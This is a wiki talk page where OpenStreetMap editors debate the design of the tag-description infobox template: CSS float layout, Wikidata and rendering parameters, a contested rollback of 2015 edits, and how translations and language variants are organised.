"ccccc" and the icon that are flowing around the two floats. Note also that the third line does not float around the two floats because of the effect of clear on the second div: clear has the effect of clearing only the right margin, but the third div is not moved down because it is still positioned by the position on the *left* margin (even if its content is text-align:right) - The only way to get three non overlapping divs float, is to embed them in a "position:relative" div, make the 3 divs as floating, and then append a 4th empty div (within the main relative div) containing "clear:both" so that the relative div will contain everything, even if the floats inside it are overflowing. <html> <body> <div style="position:relative"> <div style="float: right; width: 150px; border: 2px solid black;">aaaaaaaaa</div> <div style="float: right; width: 250px; border: 2px solid black;">bbbbbbbb</div> <div style="float: right;> <div style="clear:both"/> </div> </body> </html> - Note in that case that the first two divs are allowed to show side by side: bbbb must be to the left of aaaa (which is the rightmost) or below aaaa if bbbb can't fit the width in the remaining margins. - Also the third div showing ccccc and the icon can also show side by side: cccc and the icon must be to the left of bbbbb (which is more to the right) or below bbbb if cccc and the icon don't fit. - But note also that the third div does not specify a width, so its default width is still 100% and does not fit in the margins partly occupied by the two first float divs, so the whole div will wrap below the two first floats... - Floats in HTML/CSS are complex to understand the first time. You need to understand the CSS box model and the full effects of "position:", "float:" and "clear:". You also need to understand what "width" designates: it does not include the outer margins, borders, and paddings of the element (except if you use a new CSS3 property to change the "box-sizing" model, to be the "border-box" like IE6 does by default, when the default standard of HTML is the "content-box"). — Verdy_p (talk) 16:56, 26 May 2015 (UTC) Website and URL pattern It seems we need to continue the discussion from Template_talk:KeyDescription#Website and URL pattern because the fields in question have been carried over to the unified template. Given that a majority had stated their opposition to these highly specialized fields, and Andy did not respond to the objections for two weeks, I think these fields should be removed from this template again unless convincing new arguments are brought forward. --Tordanik 20:11, 18 April 2014 (UTC) - We should be having any discussions of these useful parameters in a more prominent place than one user's transitive sub-page's talk page; I'll respond at Template_talk:KeyDescription. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 21:16, 18 April 2014 (UTC) Missing templates You overlooked {{el:KeyDescription}} and {{pt-br:KeyDescription}}. --Andrew (talk) 09:56, 20 April 2014 (UTC) - Rats, they've come in since I started, and I'd not noticed them. :-( Thanks - I'm impressed! Moresby (talk) 12:04, 20 April 2014 (UTC) - Also {{KeyDescription no translation}}and {{ValueDescription no translation}}. --Andrew (talk) 14:56, 20 April 2014 (UTC) - And {{Wertbeschreibung}}. --Andrew (talk) 18:03, 20 April 2014 (UTC) Formatting of parameters Hi Moresby, I think you should stop trying to format the parameters in templates by including spaces. I use a different font or editor than you do apparently and therefore it actually looks worse after you add those spaces to have equal signs aligned. I believe that this will be true for others as well. Thanks.Chrabros (talk) 05:33, 23 April 2014 (UTC) Thank you for doing this This discussion was moved from User talk:Moresby. The templates with the Pt-br: prefix needed maintenance and nobody knew or had the time to fix them. Thanks for doing this work. --Jgpacker (talk) 20:51, 23 April 2014 (UTC) - You're welcome - and it's really kind of you to say so. Thank you. Google translate suggests: "Seja bem-vindo". :-) Moresby (talk) 20:36, 23 April 2014 (UTC) Templates without image parameter Now that the dust of the big changes has settled, I'd like to bring up the topic of how to handle templates with no image being set. The current behaviour (which was introduced along with the template restructuring) is to show a huge version of the "key" or "key=value" icon. I would prefer if we would just use no image at all in those cases (e.g. abstract things like Key:type). --Tordanik 08:45, 27 June 2014 (UTC) - The only image I could think of for type is the relation icon. While there are certainly pages without images that could have them, an abstract image or the old way of nagging about it with “No image yet” seems pointless. --Andrew (talk) 08:17, 28 June 2014 (UTC) Wikidata There is a discussion on whether/how to keep the recently added wikidata parameter at Template talk:ValueDescription#Wikidata.--Andrew (talk) 12:03, 2 September 2014 (UTC)--Andrew (talk) 12:03, 2 September 2014 (UTC) Why statuslink is present in documentation but not used in template? Open questions: - Should pages outside English namespace link to English proposal? - What if Proposal wasn't translated in page language? Should we link to English proposal? Should we show red link? - If proposal is in Multiple languages, which of them 'main'? first appearance in docs. 02:34, 12 December 2014 (UTC) - I think the parameter statusLink should be available in the template, but it doesn't quite seem like it's either ever been added -- or added back after some refactoring was done. I can't tell. However, either way, to answer your questions from my subjective point of view. I think pages outside the English namespace should (at least for the time being) link to the English proposal. It seems the most natural as the majority (all?) proposals are in English, though the process doesn't say anything about this being a requirement. This extends to point #2, and here I feel the same way: for the time being, simply link to the main proposal page. It shouldn't do anything else, nor care about namespace -- the main proposal page only exists in one location and language, from what I've mostly seen. The main one would be the proposal composed by the original team/author, as deemed by the submitter. Messy Unicorn (talk) 03:42, 1 January 2015 (UTC) Wikidata link Having a magic number that links to a cryptic page can frighten new users and wastes space for established ones who will tune it out. Wikipedia doesn’t link like this even when it generates content from Wikidata. Even if having the reference makes sense for machine reading pages it shouldn’t be visible.--Andrew (talk) 09:56, 30 December 2014 (UTC) - Please do not remove the Wikidata link. The hookum that this "can frighten new users" is without foundation, and we are not going to run out of space on our wiki pages. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 10:44, 30 December 2014 (UTC) - I agree that it can be slightly problematic. Most users probably don't know what Wikidata is. Wikipedia links are more usable/friendly and often available in the wiki page. As Wynndale pointed out, we can leave the parameter without making it visible. --Jgpacker (talk) 14:27, 30 December 2014 (UTC) - You may agree, but where is the evidence? Hiding values is harmful; it leads to people not spotting errors. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 15:05, 30 December 2014 (UTC) - Wynndale, so what is your proposed action? What does Wikipedia use to link to Wikidata?--Jojo4u (talk) 13:08, 7 February 2015 (UTC) - Wikipedia uses Wikidata by searching in it an item that matches the current page name (in the "wikipedia" properties). When an entry is found, it will list the other "wikipedia" links found in the matching Wikidata entry (those entries will be added to those for which there are explicit interwikis to specific wikipedias (but those are now deprecated and no longer necessary: if they are present, they override the interwikis found in Wikidata for the same language, and the link found in Wikidata will not be displayed; but Wikipedia will still incldue a link at the bottom of the list to show the existing Wikidata page that has been found). - However this OSM wiki still does not know how to query Wikidata to retrieve a list of Wikipedias (in fact this wiki does not perform any query to Wikidata, it does not even have an interwiki for it, so we link Wikidata via wikipedia, or use absolute URLs). Effectively this wiki does not have the MediaWiki extension for the Wikidata client. — Verdy_p (talk) 17:11, 26 May 2015 (UTC) Rendering Could we include rendering, as seen, for example, in Tag:historic=memorial#Rendering, in a table in this template? I've made the template {{Rendering}}, which may help. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 16:14, 27 April 2015 (UTC) - Ooh, I quite like that! Moresby (talk) 20:30, 27 April 2015 (UTC) - OK, I've implemented that in this template, and on the above article. As you can see, the table markup has gone awry. Can anyone fix it, please? Otherwise, feel free to revert me and I'll try again later. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 22:25, 27 April 2015 (UTC) - I don't think that the infobox is the right place for rendering. In my opinion, the infobox needs to be somewhat short to be useful, which is hard to achieve once the list of projects becomes longer. But perhaps more importantly, many features cannot be displayed as a mere icon, there needs to be more room to also allow area features and the like. This means that a gallery on the body of the wiki page would be a much better solution. I have therefore reverted your additions for now. Let's discuss this for a bit more than 6 hours before deciding on a solution. --Tordanik 09:12, 28 April 2015 (UTC) - And many can be displayed as an icon; since the parameter is optional, it can be used where suitable, and not otherwise. Where icons are available it makes sense to have them in place which is predictable and machine-parsable. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 11:51, 28 April 2015 (UTC) - Ok, I'm going to explain my point of view in some more detail: - I agree that the location should be predictable. But displaying the rendering in different places, depending on whether it's rendered as an icons or a larger area, is not predictable. It would be much more consistent to always have a rendering gallery in a "Rendering" subsection after "How to map" and "Examples". - I believe that it's not a good idea to have all these images uploaded manually. It would be better to automate this, and therefore ensure that the rendering being displayed is always the latest one. Therefore, I think you have it backwards: Ideally, the rendering data would not be readable by machines, but written by machines (e.g. based on Taginfo's project feature or, if Jochen is not interested in that, a different database). - What's your opinion on this? I hope we can still make progress through discussion rather than a revert war. --Tordanik 12:21, 28 April 2015 (UTC) - I agree with given points. Previously we were placing only current and most popular renders at wiki. Today there way more programs that use OSM data (most recent ones OSMAnd and maps.me) - You may be surprised, but many wiki readers used to different renders than presented at Tag:historic=memorial#Rendering right now. - I wish we had option to store user preferences in cookies and only display preferred renders per each visitor. But this is challenging task to do at wiki AFAIK. Xxzme (talk) 14:33, 28 April 2015 (UTC) - I'm not in the least surprised; that's why I made a template which can be expanded as the community sees fit. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 20:48, 28 April 2015 (UTC) - The template I created can also be written by machines. It would also be possible to extend it, or to create an alternative, for linear and area renderings. Wikis are intended to be improved incrementally. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 20:48, 28 April 2015 (UTC) The changes I made have now been reverted by an admin, who has also protected the page. What shocking behaviour. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 20:48, 28 April 2015 (UTC) - The shocking behaviour begins with your edit (1). Please vote for your changes only after all (lists.openstreetmap.org). We will not argue. And we do not need editwar in an important template! In addition caused your extension errors. Read in DE --Reneman (talk) 21:31, 28 April 2015 (UTC) - Your comment is nonsensical. What are you trying to say? Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 22:24, 28 April 2015 (UTC) Edits since January 2015, consider reversion I find some of the edits during this year to the templates {{Description}}, , {{KeyDescription}} {tl|ValueDescription}}, , {{RelationDescription}} {{DescriptionLang}} and {{StatusLang}}, also the documentation subpages {{Description/doc}}, , {{KeyDescription/doc}} , {{ValueDescription/doc}} , {{RelationDescription/doc}} {{DescriptionLang/doc}} and {{StatusLang/doc}}, to be of low quality and not improvements to the carefully thought-out and multilingual set of templates. Therefore I propose to roll the templates back to their state on 1st January, only keeping translations of keywords into more languages and changes that can be defended as improvements. Sorry if I haven’t appreciated the benefits of any edits.--Andrew (talk) 18:45, 18 May 2015 (UTC) - Also {{ElementUsageLang}}and {{ElementUsageLang/doc}}. Any blocked users who want to comment can post on the Wiki team forum.--Andrew (talk) 05:02, 19 May 2015 (UTC) - Please be more specific: Which parameters would be affected or removed; and what else would change? Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 07:57, 19 May 2015 (UTC) - I’m not pointing to individual edits because I believe people should be given a second chance but specific issues include variation in the colours of infoboxes and depopulation of Category:Cs:Czech Documentation. I am also concerned about a possible control agenda in some edits that sees the quality of OSM’s tag documentation as acceptable collateral damage, and this may have led to side effects that I’m unaware of.--Andrew (talk) 06:17, 20 May 2015 (UTC) - I'm not asking you to point to individual edits; I'm asking you to detail the changes you prose to make. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 10:58, 21 May 2015 (UTC) - I want to roll the seven templates I named and their documentation subpages back to their state at the beginning of this year, only keeping changes established as beneficial in this discussion (currently extra translations and statuslink) and reverting the others whole.--Andrew (talk) 17:52, 21 May 2015 (UTC) - I know you do; I read what you wrote above. I've asked you more than once now to describe in detail what the effect of doing that would be. You seem surprisingly reluctant to do so. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 18:24, 21 May 2015 (UTC) - The changes I want to roll back are the ones in the page histories of the pages I’ve listed; although I haven’t completely analysed one or two of them, regressions reported on the editor’s talk page make it clear that they didn’t understand the full effects either. Again, I don’t think it’s helpful to name individual editors here as it may hinder them from constructive work in the future.--Andrew (talk) 11:55, 22 May 2015 (UTC) - - Oppose per the lack of answer to my qeustion above. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 18:24, 21 May 2015 (UTC) - Well, I would be glad if my Category:Cs:Czech Documentationwould work again. I do not know why it stopped working and I suspect the recent changes has broken something. Chrabros (talk) 06:44, 22 May 2015 (UTC) The changes since January have been (excluding those already reverted): - To {{Description}}: - Link for statuslink parameter (to be kept). - Change of colour to white to stop an argument, not as a considered change. - Massive rearrangement of whitespace that broke relation descriptions and makes extensive other changes harder to follow. - Depopulation of Category:Cs:Czech Documentation. - Removal of link to source for images. - To {{KeyDescription}}: - Low-value fiddling. - To {{ValueDescription}}: - Low-value fiddling. - To {{RelationDescription}}: - Hurried workround to changes to {{Description}}. - To {{DescriptionLang}}: - To {{StatusLang}}: - Ordering by string instead of language (need to consult translators whether good). - Updated translations to French and Czech (to be kept). - To {{ElementUsageLang}}: - Ordering by string instead of language (need to consult translators whether good). --Andrew (talk) 18:56, 25 May 2015 (UTC) - Many of the partisan descriptions above amount to "The changes have been changes". In the absence of more useful descriptions - and veiled threats notwithstanding - I remain opposed to a wholesale rollback. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 19:26, 25 May 2015 (UTC) - Overall I agree with the reverts proposed. Fiddling with whitespace seems to be mostly scratching an itch, but it's too easy to break something and was made in a way that makes it costly to review. Also, I think ordering by language is better, because otherwise a translator may easily miss other strings. --Jgpacker (talk) 02:23, 26 May 2015 (UTC) - What is your view as a Portuguese speaker of the use of pt | pt-br =collapsed together in the changed translation templates?--Andrew (talk) 06:13, 26 May 2015 (UTC) - It's ok if they really are equal, but preferably it should be done by a native portuguese speaker if they don't already have the same translation. If there was only one of them with a translation, and another was added without review by a native speaker, then it should be reverted, but if they were already equal and they were collapsed like that, then I would guess it's okay. --Jgpacker (talk) 13:13, 26 May 2015 (UTC) - Even if there's a single reviewer for one version, it is still preferable to create it for both versions of the language, otherwise one will see a portuguese message, and another will just see the default English fallback (which is worse even if there's a need for a small change for the second version). Mutual understanstanding is warrantied between the two variants of the language (and in fact, both countries have agreed now to accept mutual additions or variations in normal usage; there's no longer separate terminlogies required). On Wikipedia, both versions are equally accepted. In my view, maintaining two versions on this wiki is just a loss of time and efforts. - The situation is a bit different for "zh-hans" vs. "zh-hant", because this wiki still does not feature the automatic transliterator used on Wikipedia, so a single "zh" version still does not work properly). - However we don't need "zh-tw", "zh-cn", "zh-sg" (which were used on Wikipedia and are now highly deprecated in favor of distinction of script variants). - For the same reason, we don't need "md", or even "ro-md", but we may need "ro-cyrl" for Moldavian (however script transliterators would work better), which is in fact written there in both Latin and Cyrillic script (and no real difference in Latin with Standard Romanian; "Moldavian" was invented in the 1950's in USSR and there was then attempts to integrate Russian terminology in it; this failed, and in fact Moldavians are either using the standard Russian language directly, or the Romanian language only transliterated automatically to Cyrillic, or standard Romanian in the Latin script; Romanian just uses the basic Latin alphabet with a diacritics for two additional consonnants; these combined letters are unambiguously converted to Cyrillic; some Cyrillic letters are not easily transliterated to Latin, but actually not used for Moldavian, they are used only for Russian or Bulgarian terms...). So it would be fair to support here "ro-cyrl" for Moldavian, in addition to "ro", only because we still don't have transliterators in this wiki, but more importantly because automatic transliterators will break many pages containing English terms or terms in other Latin-written languages than Romanian. As well the transliteration from Cyrillic would break Russian and Bulgarian words (which should still not be transliterated). A transliterator may work on this wiki in the future, but only if we can properly tag all multilingual contents with the correct language code (so that only Romanian/Moldavian will be affected, but not everything else). Transliterators could also be implemented only in wiki editors to help contributors, but only if they save in appropriate pages tagged with "Ro:" or "Ro-cyrl:" prefixes in page names. However it is not worth the effort, given the very small number of real contributors for Moldavian (that prefer in fact contributing only in standard Russian or standard Romanian). Moldavian supporters are in fact very few, and this is a very small country whose population is divided between pro-Romanians, and pro-Russians, and in fact little support for "Moldavian" as a separate entity (this distinct linguistic support has only existed for a couple of decenials, and stopped long before the collapse of USSR; now only the nationality/ethnic concept remains but local communities prefer supporting standard Romanian or Standard Russian... or both, without mixing their respective scripts). - (this is not the case for Serbo-Croatian whose division is now effective and increasing between dual-scripted Serbian, Latin-only Croatian... and Latin-only Bosnian, another recent creation mixing some aspects of "pure" Croatian, "pure" Latin-Serbian, and some aspects borrowed from Albanian in an attempt to unify the country)... - As well, it is still necessary to maintain separate Latin and Cyrillic versions for Serbian (a transliterator could do the job, but this would cause problems if applied blindly on a complete page). — Verdy_p (talk) 16:36, 26 June 2016 (UTC) The changes to documentation subpages since January have been (excluding those already reverted): - To {{Description/doc}}: - Changes to documentation of status parameter (deserves a separate review). - Addition of editing warning (to be kept). - Adjustment of wiki syntax (to be kept). - To {{KeyDescription/doc}}: - Tidying of documentation and additional explanations (to be kept). - Addition of editing warning (to be kept). - To {{ValueDescription/doc}}: - Addition of editing warning (to be kept). - Adjustment of wiki syntax (to be kept). - To {{RelationDescription/doc}}: - Adjustment of wiki syntax (to be kept). - To {{DescriptionLang/doc}}: - Table of translations flipped (columns were languages, now translations). - This is the most important change: there were already too many columns and with the table restricted width, not only you had to scroll horizontally, but all texts were split on multiple lines with one or two ords per line. - In addition the code to do that was huge and contained errors caused by incorrect copy-pasting. Now it is much shorter and simpler: you can also add some translated languages easily by editing ony one line, and the tables are readable. Note that this table is actually not part of the doc, it is just a testcase shown at end of the doc to get a status of existing translations; the template is not used this way anywhere else. - I am definitely not convinced this is "poor quality" but really improved quality (with easier maintenance as well) and it was absolutely not a change of the template itself (since when doc pages are templates? There are many templated having absolutely no documentation on this wiki and never tested with enough test cases). Ideally even this long table should not be part of the /doc subpage but of a testcase subpage (initially it was in /table to visit via a link from the doc page, but for now it has remained for now in the /doc page, as it was). — Verdy_p (talk) 15:26, 26 May 2015 (UTC) - To {{StatusLang/doc}}: - To {{ElementUsageLang/doc}}: --Andrew (talk) 06:13, 26 May 2015 (UTC) - Note also that these translations (in the template, not the doc page) were really bad and unmaintained, or just copying English because these translatable strings were added at different time, but not maintained the same way across languages. It is much safer to keep each translation per resource. This allowed to add correct transaltions that were missing, without having to duplicate them. For example pt and pt-br were already copies of each others (except one that was showing English). switching first by resource name than by language allows simpler maintenance of each resource, even if for a new language this means editing in several places (but there's no need to add any #switch, the translators use the same model used for translatable switchs: they just insert a single line with the leading language code, and can easily add fallbacks (such as "pt|pt-br=" or "zh-hans|zh-hant=" when they are the same: if it is neexded to separate them, it is easy to duplicate that line, separate codes, and edit one of them, like in all other translated templates). Other fallbacks better than English can also be easily specified (e.g. "fr|br|oc=" to reused the same French resource when the "br" or "oc" resources are still not there) - Also the last resources at end were actually not translated at all in most languages (they used "TranslateThis" multiple times), now the "TranslateThis" is factorized just to the default line and does not need to be edited). Language fallbacks are useful in all translated projects (before the flip, the only fallback possible was to English). - If you want to add new items to translate, you don't need to review all the existing translations and update them; add the resource with a single TranslateThis English fallback, and add a single line for a language you know without assuming that the English fallback will be used always. Translators also don't have to translate everything, they translate item per item, without copying blocks. Overall the code size is also even smaller, and translations occur within the context of a single translation unit (exactly like in ".pot" files, Translatewiki.net, CLDR survey, or other translation projects: this is the standardized way where we work unit by unit). - Final note: the TranslateThis template generates an image and a link that does not fit correctly in translations that are used in "title=" attributes for showing hints, this generates incorrect HTML or incorrect wikisyntax. the including of the TranslateThis template should be conditional (there were cases were this broke the generated page in some language that were incompletely translated). For now I've not found any way on this wiki to filter out the HTML presentation in resources that are used in a way supporting ONLY plain-text without any additional HTML element or link, as this wiki does not have this filtering capability). Only in some cases, for specific resources, using TranslateThis may be safe (but the target of the link is still wrong). In my opinion, the icon and link should not be used, and the Description box templates should just include a single small "translate" link in the box, showing where it is translatable: the link can just point to the box template page showing the lists of templates containing translatable resources in its documentation. — Verdy_p (talk) 16:11, 26 May 2015 (UTC) Unlinked image The image was recently changed such that clicking it doesn't lead to the original picture (with [[{{{image|}}}|200px|link=]]). The image should be linked or have a link to its full size version and attribution. Mrwojo (talk) 15:29, 23 May 2015 (UTC) - This link change was unexpected, the "|link=" part can be removed without problem (but it was already present in some other parts of the template for other icons). — Verdy_p (talk) 15:17, 26 May 2015 (UTC) - As there were three comments above requesting the restoration of the link, I restored it (but not for the other icons which all used the empty "|link=" parameter). If you wish you can add "|image_caption=" (optional); however this parameter is still not used in the 3 main templates using Template:Description (for relations, tags, or features). — Verdy_p (talk) 17:23, 26 May 2015 (UTC) One discussion place Currently discussion about Template:Description is spread over this page and Template talk:KeyDescription, Template talk:ValueDescription. This triples the time to check and lowers chance of successful discussion to one third. I propose to put an ambox on the top and bottom of Template talk:KeyDescription, Template talk:ValueDescription, Template talk:RelationDescription that topics which affect alle those templates should be done over here.--Jojo4u (talk) 12:07, 22 May 2016 (UTC) Remove User:Moresby links from See Also On Template:Description on section "See Also" are three links to the User:Moresby namespace. I guess they can be removed now?--Jojo4u (talk) 12:13, 22 May 2016 (UTC) Support of value only The values *=construction and *=proposed are used for many keys with the same meaning. Potentially also *=sidewalk (for footway, path, cycleway). Using Template:ValueDescription with key=* and value=construction gives links to Key:* and Tag:*=scheduled which looks not good. - What would be the best way of using the current templates for *=construction? - Would another template (e.g. ValueOnlyDescription) be useful? - What about a new namespace: ? --Jojo4u (talk) 13:52, 22 May 2016 (UTC) Separating usage and proposal status I started a discussion about separating usage and proposal status in this template: - Tag descriptions by group - Tag descriptions for key "highway" - Tag descriptions - Tag descriptions by value - Tag descriptions with no status specified - Feature pages with missing images - Tag descriptions by key - Key descriptions by group - Key descriptions - Key descriptions with status "in use" - Key descriptions with no status specified
http://wiki.openstreetmap.org/wiki/Template_talk:Description
CC-MAIN-2017-09
refinedweb
10,404
57.71
UFDC Home myUFDC Home | Help | RSS <%BANNER%> TABLE OF CONTENTS HIDE Section A: Main Section A: Main: Opinion Section A: Main continued Section A: Main: Health Section A: Main continued Section B: Sports page B 3 Section B: Classified Advantage page B 4 page B 5 page B 6 Full Text On the Hardwood Columbia, Fort White gear up for district basketball tournament. Clearing the Way Officials begin demolition work to protect Rose Sink. Local & State, 6A I:Ifs;~ ___________________________________ Tuesday . .February 15, 2005 Lake City, Florida r 50o Weather Partly Cloudy High 78, Low 51 Forecast on 2A Unnamed murder suspect already in custody SMan suspected of the , Jan. 18 killings in jail 1 for another crime. By JUSTIN LANG Sjlang@lakecityreporter.com The Lake City Police Department says it has a sus- pect in custody for the Jan. 18 murder of a homeless man; however the inmate has yet to be charged in the crime. Investigators have not released the suspect's. name, but only that he is a black male and is being held at the Columbia County Detention Center on an unrelated charge with a $250,000 bond. With murder charges still pending, Laxton provided few details other than to say the investigation in the Jan. 18 killing of James Derrick Razor, 39, is still ongoing and police are working closely with the State Attorney's Office. "We are still working on it and we have a suspect in mind, but that's all we can say about it," Laxton said. He said he didn't know when the suspect may be charged with Razor's murder. "We are just taking our time and making sure everything is done right," Laxton said. Laxton said he feels confi- dent with the suspect and the murder charge that is likely forthcoming. Two local women found Razor's body on Jan. 20 lying in the grass beside an aban- doned house at 803 Dundee Way and called 911. When police responded to the scene, they say Razor was found fully-clothed, apparent- ly having died of a gunshot wound to the head. Investigators soon learned he had been released from the detention center on Jan. 18 after being held on charges of misdemeanor *marijuana possession and violating the city's open container (of alco- hol) law. Police said it was Razor's second time at the MURDER continued on page 11A The healing power of pets Lake City Medical Center introduces new therapy By JUSTIN LANG jlang@lakecityreporter.com Some patients at the Lake City Medical Center received .a special Valentine's visit "Monday afternoon from ther- apist Pepi McClead. I Her first time at the med- ical center, Pepi was pleased to receive a joyous welcome from all staff and patients she Same across. So enthusiastic she was, Pepi soon went into the room of 93-year-old patient Clarice Witt of Lake City, jumped into the bed and curled up right beside her. For anyone else, the behavior might seem odd, but being a black, white and brown Pappillon, it was excused and even welcomed. A certified pet therapy dog, Pepi was at the medical cen- ter Monday for the facility's first day of offering the serv- ice to its patients. Delores Brannen, director of marketing, said it was a delightful coincidence the r.,, JUSTIN LANG/Lake City Reporter Lake City Medical Center patient Clarice Witt, 93, of Lake City touches the soft fur of Pepi McClead, a pet therapy dog from Columbia County Senior Services. The medical center started pet therapy for the first time Monday, giving patients an unexpected Valentine's Day gift. 6We want them to feel at home here, so we want to bring the pet to them. 9 Delores Brannen marketing director Lake City Medical Center first day also happened to be Valentine's Day, But she said the planning for pet therapy at Lake City Medical Center actually began about three months ago as a way to fur- ther expand its range of patient care. "It's just another service we wanted to be able to offer our patients," she said. "We want them to feel 'at home here, so we want to bring the pet to them." Kathy Wisner of Columbia County Senior Services is helping to coordinate pet therapy at the medical center and brought Pepi around to patients on Monday. Pepi is owned by Don and Mary McClead (Mary is a painting instructor for Senior Services) and had to undergo both training and an exten- sive health certification to become an official pet thera- py dog. Since being certified, she has made previous thera- py visits to patients at North Florida Regional Medical Center in Gainesville. Dr. Brent Hayden, who happened upon Pepi in the halls of the local medical cen- ter Monday, said he is in PETS continued on page 11A 4K.. ~-.... K... . .. ...... Fort White student gets appointment to Air Force Academy Student among 1,200 across country to get selected for academy By TONY BRITT tbritt@lakecityreporter.com FORT WHITE Bryan Taylor's childhood dream of becoming an F-16 fighter pilot is about to materialize before his eyes. Taylor, a Fort White High student, has received an appointment to attend the U.S. Air Force Academy in Colorado Springs, Colo., as part of the academy's Class of 2009. "I think it's really cool," Taylor said of his appoint- ment. "It's something only a few people in the state get to do." According to reports, Taylor is one of only 1,200 stu- dents nationwide to receive the appointment. Taylor, 18, said he has thought about going into the CALL US: (386) 752-1293 SUBSCRIBE: 1 755-5445 Air Force F since he was a small child because he always want- ed to fly. He Taylor also said sev- eral of his family members have served in the Air Force, including his stepfather, both of his grand- fathers and his brother. Keith Hatcher, principal of Fort White High School, said Taylor is the first student from his school to earn an appoint- ment to the academy. "Bryan is a great kid," Hatcher said. "He's a good role model, a go-getter and anything you ask him to do, he'll do. He's a great student and athlete and I'm proud of him." Taylor, 18, said at times his confidence wavered as he waited to get word whether he would be admitted to the ACADEMY continued on page 11A Olustee Festival collector's item available soon Special envelope with Olustee cancellation on sale Friday at festival. By TONY BRITT tbritt@lakecityreporter.com The brave actions of sol- diers who died in the Battle of Olustee more than 130 years ago have been honored in many ways. Activities ranging from a reenactment battle to postage stamps have served as proof of how the fallen troops have been revered through the years. During the 27th Annual. Olustee Battle Festival this weekend, local residents can pay homage to the troops by purchasing a collector's edi- tion envelope with the Olustee Festival cancellation from the local postal service. The envelopes will be on sale Friday and Saturday beginning at 10 a.m. at the U.S. Postal Service trailer near the Columbia County Courthouse Annex as part of the 27th Annual Olustee Battle Festival festivities. Joseph Wilson, a Blue-Grey Army volunteer who also serves as a volunteer with the Joseph Wilson, a volunteer with the Lake, City Post Office, holds a collector's edition envelope with the Olustee Festival cancellation. The items will be on sale beginning Friday dur- ing the 27th Annual Olustee Battle Festival. Lake City Post Office, said he is uncertain how many envelopes have been printed for the 2005 Battle Festival, b.ut they have become collec- tors' items. He said the stamps have been combined with the Olustee Battle Festival so peo- ple all over the United States will know about the Olustee Battle Festival. 'There are some special envelopes that have been printed that go back about 4 or 5 years and they've been framed," Wilson said of items available for this year's festi- val. He said they can be pur- chased for $25. "We'll also have regular stamps," he said. Wilson said this year's can- cellation image has a silhou- ette of two crossed flags, one northern and the other south- ern. A purple heart sits between the two flags. "By popular demand, we are going to use the Purple Heart stamp again," he said. "We're also going to have goodies for children coloring books, crayons, and other miscella- neous items." Wilson said Duffy Soto, a Lake City artist, contributed to the design of the cancellation, which is located on the upper- left portion of the envelope and contains a small duplicate image of Soto's 2005 Olustee Reenactment Battle Festival. Wilson said the cancellation has become an annual part of the festival. "We have the cancellation every year because we get the OK from the high command to use it and it contains the date just for those two days," he said. 'This has been going on for sometime, not just here in Lake City, but all across the United States for different functions. Our can- cellation is unique because it's an original by Duffy Soto, who as usual, does that every year." This year some of the pro- ceeds from the cancellation sales will go to the Lake City Purple Heart Organization for local veterans. TODAY Classified ..... .4B Comics ......... 3B Local & State ... .3A Business ....... 5A Obituaries ....... 6A Opinion ..... 4A Puzzles ........ 4B Scoreboard ...... 2B World . . .12A Weather . .2A Wete....2 san m ".,'. { -:. .....j ..... 2A LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 ~- o n= -vs Oa * * * * T fv.m -No qm w 4 401b Slo LAKE CITY REPORTER HOW TO RACUS CLASSIFIED Main number .......... (386) 752-1293 To place a classified ad, call 755-5440. Iax6Reporter,krLhLAuIG Advertising Director Karen Craig...............754-0417 craigi@ lakecityreporter.com) Sales ...................74.152-1293 BUSDI ...... $89.70 Lottery MIAMI Here are the winning numbers in Monday's Florida Lottery: Cash 3: 5-5-4 Play 4: 9-6-2-8 Sunday's Fantasy 5:19- 21-23-27-35 Correction The Lake City Reporter corrects errors of fact in news items. If you have a con- cern, question or suggestion, please call the executive edi- tor. Corrections and clarifica- tions will run in this space. And thanks for reading. THE - mWAT "Copyrighted Material Syndicated Content" _-- Available from Commercial News Providers" N4M jvp 0 * 1, 4 S * ~- ~ * S '-'a ',-~- 0 S ~ I Little Caesars hh 6 363 SW Baya Dr. 961-8898 SHwy 47 & 1-75 755-1060 Offer limited to first 150 customers of the day /t K'** ER e -- FRE ak ityReorerpae r 4w IL a am-am * * Q Q ON one duo qlL QM LOCAL & STATE'~ LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 3A Masonic Lodge plans Youth Night Celebration Thursday By TODD WILSON twilsoh@lakecityreporter.comrn Lake City Masonic Lodge No. 27 will host a Youth Night Celebration at the group's lodge Thursday. The event begins at 7 p.m., at the lodge at 2685 McFarlane Ave., and is open to the pub- lic. The Youth Night theme is designed to showcase young. people from several areas of the community and invite the, public for the free perform- ance. "We want people to come in and enjoy this event and see the Masonic Lodge, see what we're all about," said Jerry Morgan, Lake City Masonic Lodge activities chairman. "We've stayed behind our four walls for too long. We want to reach out and be more involved in the community." The Youth Night activities will feature several perform- ances from Columbia County school groups and individu- als. The night will begin with the presentation of the colors by the Columbia High School Army JROTC unit, followed by the pledge of allegiance. The National Anthem will be sung by Caitlin Eadie, an accomplished Lake City singer. She, will perform two additional songs during the program. Following the National Anthem, the JROTC unit will perform its eight-minute pre- cision floor-drill routine for the crowd. The "Fancy Dancers," a Columbia County dance group, also will perform dur- ing the event. 'This is a school night, so we won't keep these kids out very long," Morgan said. "This whole event will take less than an hour." The Youth Night Celebration ,will end with John Leaman, a member of the Cherry Hill Masonic Lodge No. 12 at Fort White, playing guitar and singing 'The Mason's Prayer." Refreshments will be served to the public follow- ing the event. '"We want anyone to come out and be with us," Morgan said. "We want people to get to know us." LCCC to host science fair Lake City Community College will host the Suwannee Valley Regional Science and Engineering Fair Feb. 22-24 in Howard Gymnasium. The fair will include about 130 student projects in the, fields of behavioral and social science, chemistry, biochem- istry, botany, computer 